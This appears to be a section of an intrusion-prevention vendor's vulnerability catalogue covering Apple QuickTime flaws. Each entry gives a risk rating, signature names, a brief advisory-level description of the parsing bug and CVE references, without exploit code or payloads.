There exists a memory corruption vulnerability in Apple QuickTime application.

Situation:

File-MPEG_Apple-QuickTime-Crgn-Atom-Parsing-Memory-Corruption

References:

CVE-2008-1017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1017

Apple-QuickTime-Enof-Atom-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-529-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to improper validation of the size field of the enof atom in QuickTime movie files. A small enof size value can cause data to overflow into an adjacent buffer leading to a heap buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a maliciously crafted QuickTime movie file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

File-MPEG_Apple-QuickTime-Enof-Atom-Parsing-Heap-Buffer-Overflow

References:

CVE-2013-0986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0986

OSVDB-93618
http://www.osvdb.org/93618

Apple-QuickTime-FlashPix-File-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Apple QuickTime. A remote attacker can exploit this vulnerability by enticing a user to view specially crafted FlashPix files. Successful exploitation of this vulnerability can lead to arbitrary code execution in the context of the current user. An unsuccessful code execution attempt can lead to abnormal termination of the vulnerable program.

Situation:

HTTP_SS-Microsoft-OLE-Structured-Storage-Excessive-SAT-Size
File-OLE_Microsoft-Structured-Storage-Excessive-SAT-Size

References:

CVE-2009-2798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2798

BID-36328
http://www.securityfocus.com/bid/36328

Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow

About this vulnerability:

An integer overflow vulnerability in Apple Quicktime

Risk:

High

First detected in:

sgpkg-ips-300-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Apple QuickTime

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Apple QuickTime. The vulnerability is due to an error when handling FlashPix encoded movie files. This vulnerability may be exploited by remote attackers by enticing a user to view specially crafted FlashPix file. Successful exploitation of this vulnerability can lead to arbitrary code execution in the context of the currently logged in user.

Situation:

HTTP_SS-Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow
File-OLE_Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow

References:

CVE-2010-0519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0519

BID-39020
http://www.securityfocus.com/bid/39020

Apple-QuickTime-Flic-Animation-File-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a heap buffer overflow in Apple QuickTime. A crafted FLIC animation file can be used to overflow a static buffer. This can lead to code execution in the privilege of the current user or denial of service.

Situation:

HTTP_Apple-QuickTime-Flic-Animation-File-Buffer-Overflow
File-Binary_Apple-QuickTime-Flic-Animation-File-Buffer-Overflow

References:

CVE-2006-4384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4384

BID-19976
http://www.securityfocus.com/bid/19976

OSVDB-28771
http://www.osvdb.org/28771

Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow

About this vulnerability:

Interger underflow vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Integer Overflow

Description:

There is a vulnerability in Apple QuickTime. The flaw is due to an integer underflow error in the "FlipFileTypeAtom_BtoN" function when processing crafted QuickTime media files. Successful exploitation allows remote attackers to execute arbitrary code under the context of the currently logged-in user.

Situation:

HTTP_Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow
File-MPEG_Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow

References:

CVE-2007-2296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2296

BID-23652
http://www.securityfocus.com/bid/23652

OSVDB-35578
http://www.osvdb.org/35578

Apple-QuickTime-FPX-File-Parsing-CVE-2016-1767-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-753-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There is a vulnerability caused by the improper parsing of Flashpix files in Apple Quicktime. Successful exploitation can allow an attacker to run arbitrary code on the target.

Situation:

File-OLE_Apple-QuickTime-FPX-File-Parsing-CVE-2016-1767-Memory-Corruption

References:

CVE-2016-1767
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1767

Apple-QuickTime-FPX-File-Parsing-CVE-2016-1768-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-754-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

Improper parsing of FPX files in Quicktime causes a vulnerability, which when exploited, can be used to gain code execution privileges on the target system.

Situation:

File-OLE_Apple-QuickTime-FPX-File-Parsing-CVE-2016-1768-Memory-Corruption

References:

CVE-2016-1768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1768

Apple-QuickTime-Ftab-Atom-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-579-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Apple QuickTime. The vulnerability is due to insufficient validation on the length of font names when parsing "ftab" atoms. A remote unauthenticated attacker can exploit this vulnerability by enticing the target user to open a specially crafted file with the affected application. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-MPEG_Apple-QuickTime-Ftab-Atom-Stack-Buffer-Overflow

References:

CVE-2014-1246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1246

OSVDB-103743
http://www.osvdb.org/103743

Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

Apple QuickTime

Type:

Integer Overflow

Description:

There exists a sign extension based memory corruption vulnerability in Apple QuickTime.

Situation:

HTTP_SS-Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption
File-MPEG_Apple-QuickTime-Image-Description-Atom-Sign-Extension

References:

CVE-2009-0955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0955

BID-35166
http://www.securityfocus.com/bid/35166

OSVDB-54874
http://www.osvdb.org/54874

Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There is a memory corruption vulnerability in the Apple QuickTime application. The vulnerability is due to improper checking of the Atom size field of the idsc atom in the QTIF image file. A remote attacker may exploit this vulnerability by providing a malicious QTIF image file to the target user, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption
File-MPEG_Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption

References:

CVE-2008-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0033

BID-27299
http://www.securityfocus.com/bid/27299

Apple-QuickTime-JPEG-2000-Cod-Length-Integer-Underflow

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-437-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Apple's QuickTime media player. The vulnerability is due to a memory corruption caused by insufficient validation of a JPEG 2000 COD marker segment's length value. The affected value is subtracted from, causing an underflow, before being used in a memory operation. A remote attacker could entice a target user to open a crafted JPEG 2000 file to exploit this vulnerability. A successful exploitation attempt could result in the execution of arbitrary code in the target user's security context.

Situation:

File-JPEG_Apple-QuickTime-JPEG-2000-Cod-Length-Integer-Underflow

References:

CVE-2011-3250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3250

OSVDB-76543
http://www.osvdb.org/76543

Apple-QuickTime-Media-Content

About this vulnerability:	Download of Apple QuickTime media file
Risk:	Low
First detected in:	sgpkg-ips-173-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Apple QuickTime
Type:	Insecure Configuration
Description:	Apple QuickTime is a common media file format that carries video and audio content.
Situation:	HTTP_SS-Apple-QuickTime-Media-Download File-MPEG_Apple-QuickTime-Media

Apple-QuickTime-Mjpeg-Frame-Stsd-Atom-Heap-Overflow

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a heap overflow vulnerability in Apple Quicktime. The vulnerability is due to improper processing of mjpeg movies with an improper jpeg frame size in the stsd atom. This vulnerability can be exploited by a remote attacker by enticing the target user to open a specially crafted file with the affected application. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-MPEG_Apple-QuickTime-Mjpeg-Frame-Stsd-Atom-Heap-Overflow

References:

CVE-2013-1020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1020

BID-60108
http://www.securityfocus.com/bid/60108

OSVDB-93621
http://www.osvdb.org/93621

Apple-QuickTime-Mov-File-Hreftrack-Cross-Zone-Scripting

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1555-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Cross-site Scripting

Description:

There is a vulnerability in the Apple QuickTime product that may allow cross zone scripting attacks. The flaw exists in the processing of MOV media files. A malicious user may exploit this vulnerability to execute arbitrary code or access local resources by enticing a remote user to open a malicious file.

Situation:

HTTP_Apple-QuickTime-Mov-File-Hreftrack-Cross-Zone-Scripting

References:

CVE-2007-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0059

OSVDB-31164
http://www.osvdb.org/31164

Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow

About this vulnerability:

Heap overflow vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in Apple QuickTime. The flaw is due to insufficient bounds checking in the "JVTCompEncodeFrame()" function when processing malformed MOV files. Successful exploitation allows remote attackers to execute arbitrary code under the context of the currently logged-in user.

Situation:

HTTP_Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow
File-MPEG_Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow

References:

CVE-2007-2295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2295

BID-23650
http://www.securityfocus.com/bid/23650

OSVDB-35577
http://www.osvdb.org/35577

Apple-QuickTime-Mov-File-String-Handling-Integer-Overflow

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Integer Overflow

Description:

There is a vulnerability in the way Apple QuickTime handles MOV media files. Specifically, the processing of crafted string values embedded in a MOV file is prone to a buffer overflow. This vulnerability may result in arbitrary code being injected and executed on the target host. In a successful attack, an attacker can inject code into the vulnerable target. The behavior of the target depends on the malicious code. In an unsuccessful attack, the vulnerable application may terminate as a result of the attack attempt. Note that any code executed by the attacker runs with the privileges of the logged in user.

Situation:

File-MPEG_Apple-QuickTime-Mov-File-String-Handling-Integer-Overflow

References:

CVE-2005-2753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2753

BID-15306
http://www.securityfocus.com/bid/15306

OSVDB-20475
http://www.osvdb.org/20475

Apple-QuickTime-Movie-File-Clipping-Region-Handling-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There exists a heap buffer overflow vulnerability in Apple QuickTime. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-MPEG_Apple-QuickTime-Movie-File-Clipping-Region-Handling-Heap-Buffer-Overflow

References:

CVE-2009-0954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0954

Apple-QuickTime-Movie-With-Embedded-Script

About this vulnerability:	Apple QuickTime Movie file that contains embedded script
Risk:	Low
First detected in:	sgpkg-ips-94-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Apple QuickTime
Type:	Cross-site Scripting
Description:	An Apple QuickTime movie file can contain embedded scripts that are triggered during playback. This feature is included by design. However, it is a potential infection vector for malicious scripts.
Situation:	HTTP_Apple-QuickTime-Movie-With-Embedded-Script File-MPEG_Apple-QuickTime-Movie-With-Embedded-Script

Apple-QuickTime-MP4-Absent-Stbl-Box-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Inc. QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-708-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

Arbitrary code can be executed by crafting an MP4 file that exploits a memory corruption vulnerability in QuickTime.

Situation:

File-MPEG_Apple-QuickTime-MP4-Absent-Stbl-Box-Memory-Corruption

References:

CVE-2015-3667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3667

Apple-QuickTime-MPEG-Stream-Padding-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-460-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to an integer underflow error which further leads to a heap-based buffer overflow when calculating the padding for an MPEG sample. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to download and process a specially crafted MPEG file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.

Situation:

File-MPEG_Apple-QuickTime-MPEG-Stream-Padding-Buffer-Overflow

References:

CVE-2012-0659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0659

BID-53467
http://www.securityfocus.com/bid/53467

OSVDB-81931
http://www.osvdb.org/81931

Apple-QuickTime-Pict-File-Processing-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Quicktime

Risk:

High

First detected in:

sgpkg-ips-461-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Apple QuickTime. The vulnerability is due to the way that Apple QuickTime processes malformed PICT files. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to download and process a specially crafted PICT file. This could possibly lead to code execution in the security context of the currently logged on user.

Situation:

File-Binary_Apple-QuickTime-Pict-File-Processing-Memory-Corruption

References:

CVE-2012-0671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0671

BID-53584
http://www.securityfocus.com/bid/53584

OSVDB-81942
http://www.osvdb.org/81942

Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-404-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Apple QuickTime. The vulnerability is due to lack of boundary checks while processing paintPoly atoms embedded in PICT files. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted QuickTime image file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. In an attack case where code injection is not successful, the affected Apple QuickTime process will terminate abnormally.

Situation:

HTTP_SS-Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow
File-Binary_Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow

References:

CVE-2009-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0010

BID-34938
http://www.securityfocus.com/bid/34938

Apple-QuickTime-Player-Arbitrary-Code-Execution

About this vulnerability:

An Apple QuickTime Player Arbitrary Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

Apple QuickTime

Type:

Code Injection

Description:

A vulnerability in Apple QuickTime Player, versions 7.6.6 and 7.6.7, which allows remote attackers to execute arbitrary code via the Marshaled_pUnk attribute.

Situation:

File-Text_Apple-QuickTime-Player-Arbitrary-Code-Execution

References:

CVE-2010-1818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1818

OSVDB-67705
http://www.osvdb.org/67705

Apple-QuickTime-Plugin-Content-Type-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

High

First detected in:

sgpkg-ips-492-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to insufficient bounds checking while parsing MIME types. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process maliciously crafted MIME type information. This can lead to execution of arbitrary code in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

HTTP_SHS-Apple-QuickTime-Plugin-Content-Type-Buffer-Overflow

References:

CVE-2012-3753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3753

BID-56438
http://www.securityfocus.com/bid/56438

Apple-QuickTime-Plugin-Setlanguage-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-465-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to insufficient bounds checking when parsing parameters to the IQTPluginControl::SetLanguage COM method inside the QuickTime plugin. This vulnerability can be exploited by a remote attacker by enticing the target user to open a specially crafted HTML page containing an embedded video with the affected application. Successful exploitation could result in arbitrary code injection and execution in the context of the currently logged-in user.

Situation:

File-Text_Apple-QuickTime-Plugin-Setlanguage-Buffer-Overflow

References:

CVE-2012-0666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0666

BID-53577
http://www.securityfocus.com/bid/53577

OSVDB-81937
http://www.osvdb.org/81937

Apple-QuickTime-Psd-File-Parsing-CVE-2016-1769-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-756-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

Apple QuickTime has a vulnerability which is caused by the improper parsing of PSD files. A successful exploitation will allow the attacker to run arbitrary code on the target.

Situation:

File-Binary_Apple-QuickTime-Psd-File-Parsing-CVE-2016-1769-Memory-Corruption

References:

CVE-2016-1769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1769

Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer

About this vulnerability:	A vulnerability in Apple QuickTime
Risk:	High
First detected in:	sgpkg-ips-373-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Apple QuickTime
Type:	Input Validation
Description:	There is a code execution vulnerability in Apple QuickTime ActiveX control QTPlugin.ocx. The vulnerability is due to an input validation error while parsing the value of the _Marshaled_pUnk parameter. Remote attackers could exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation would result in arbitrary code injection and execution with the privileges of the logged in user.
Situation:	HTTP_SS-Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer File-Text_Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer

Apple-QuickTime-QTPlugin.ocx-ActiveX-Vulnerable-Function-Call

About this vulnerability:

Vulnerable function call against QuickTime player

Risk:

Low

First detected in:

sgpkg-ips-580-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows;Mac OS X

Software:

Apple QuickTime

Type:

Insecure Configuration

Description:

A vulnerability exists in Apple QuickTime when calling certain ActiveX functions.

Situation:

File-Text_Apple-QuickTime-QTPlugin.ocx-ActiveX-Vulnerable-Function-Call

References:

CVE-2008-0778
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0778

BID-27769
http://www.securityfocus.com/bid/27769

OSVDB-41577
http://www.osvdb.org/41577

Apple-QuickTime-QTVR-Qtvrstringatom-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to a signedness error, which leads to a stack-based buffer overflow when processing a QTVR string atom having an overly large stringLength parameter. A remote attacker can exploit this vulnerability by enticing a user to download and process a specially crafted QuickTime VR file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.

Situation:

File-MPEG_Apple-QuickTime-QTVR-Qtvrstringatom-Parsing-Buffer-Overflow

References:

CVE-2012-0667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0667

BID-53583
http://www.securityfocus.com/bid/53583

OSVDB-81938
http://www.osvdb.org/81938

Apple-QuickTime-Rnet-Box-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to a bounds-checking error while parsing 'rnet' atom in QuickTime reference movie files. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process a maliciously crafted QuickTime reference movie file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

File-MPEG_Apple-QuickTime-Rnet-Box-Parsing-Heap-Buffer-Overflow

References:

CVE-2012-3756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3756

BID-56438
http://www.securityfocus.com/bid/56438

OSVDB-87091
http://www.osvdb.org/87091

Apple-QuickTime-RTSP-Response-Crafted-Content-Type-Header-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows; Mac OS X

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apple QuickTime. The vulnerability lies in the Real Time Streaming Protocol (RTSP) protocol support in the QuickTime.The flaw is due to a boundary error when parsing a crafted Content-Type header. A remote attacker can exploiting this vulnerability by enticing the target user to visit a malicious web site. Successful attack could allow for arbitrary code injection and execution with the privileges of the currently logged on user.

References:

CVE-2007-6166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6166

BID-26549
http://www.securityfocus.com/bid/26549

Apple-QuickTime-SMIL-File-Handling-Integer-Overflow

About this vulnerability:

An integer overflow vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-130-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows; Mac OS

Software:

Apple QuickTime

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Apple QuickTime. The vulnerability is due to the way QuickTime parses specially crafted SMIL documents. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted SMIL file or access a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.

Situation:

HTTP_SS-Apple-QuickTime-SMIL-File-Handling-Integer-Overflow

References:

CVE-2007-2394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2394

BID-24873
http://www.securityfocus.com/bid/24873

OSVDB-36134
http://www.osvdb.org/36134

Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow

About this vulnerability:

An attempt to exploit vulnerability in Apple QuickTime detected

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Apple QuickTime media player. The vulnerability is due to a boundary error in the QuickTimeStreaming.qtx file while writing a debug log error. Remote attackers could exploit this vulnerability by enticing target users to open a crafted SMIL file containing an overly long URL.

Situation:

HTTP_SS-Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow
File-TextId_Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow

References:

CVE-2010-1799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1799

BID-41962
http://www.securityfocus.com/bid/41962

OSVDB-66636
http://www.osvdb.org/66636

Apple-QuickTime-Stsc-Heap-Overflow

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-418-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a vulnerability in the media file parser in Apple QuickTime. A remote attacker can execute arbitrary code on the victim's computer in the context of the victim user when they open a malicious QuickTime file.

Situation:

File-MPEG_Apple-QuickTime-Stsc-Heap-Overflow

References:

CVE-2004-0431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0431

Apple-QuickTime-Stsd-Atoms-Handling-Heap-Overflow

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in Apple QuickTime.

Situation:

File-MPEG_Apple-QuickTime-Stsd-Atoms-Handling-Heap-Overflow

References:

CVE-2007-3750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3750

Apple-QuickTime-Targa-File-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

High

First detected in:

sgpkg-ips-494-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to a bounds-checking error while parsing Targa files. A remote attacker can exploit this vulnerability by enticing a user to process a maliciously crafted Targa file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

File-Binary_Apple-QuickTime-Targa-File-Buffer-Overflow

References:

CVE-2012-3755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3755

BID-56438
http://www.securityfocus.com/bid/56438

OSVDB-87090
http://www.osvdb.org/87090

Apple-QuickTime-Texml-Color-String-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

High

First detected in:

sgpkg-ips-463-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to insufficient validation of a string length when processing the color-related sub elements of a Style element, and color-related attributes of description, sampleData and karaoke elements inside QuickTime TeXML files. A remote attacker can exploit this vulnerability by enticing a user to download and process a specially crafted TeXML file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.

Situation:

File-TextId_Apple-QuickTime-Texml-Color-String-Parsing-Buffer-Overflow

References:

CVE-2012-0663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0663

BID-53571
http://www.securityfocus.com/bid/53571

OSVDB-81934
http://www.osvdb.org/81934

Apple-QuickTime-Texml-Style-Element-Text-Specification-BOF

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

High

First detected in:

sgpkg-ips-492-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to insufficient bounds checking while parsing style elements in QuickTime TeXML files. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process a maliciously crafted TeXML file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

File-TextId_Apple-QuickTime-Texml-Style-Element-Text-Specification-BOF

References:

CVE-2012-3752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3752

BID-56438
http://www.securityfocus.com/bid/56438

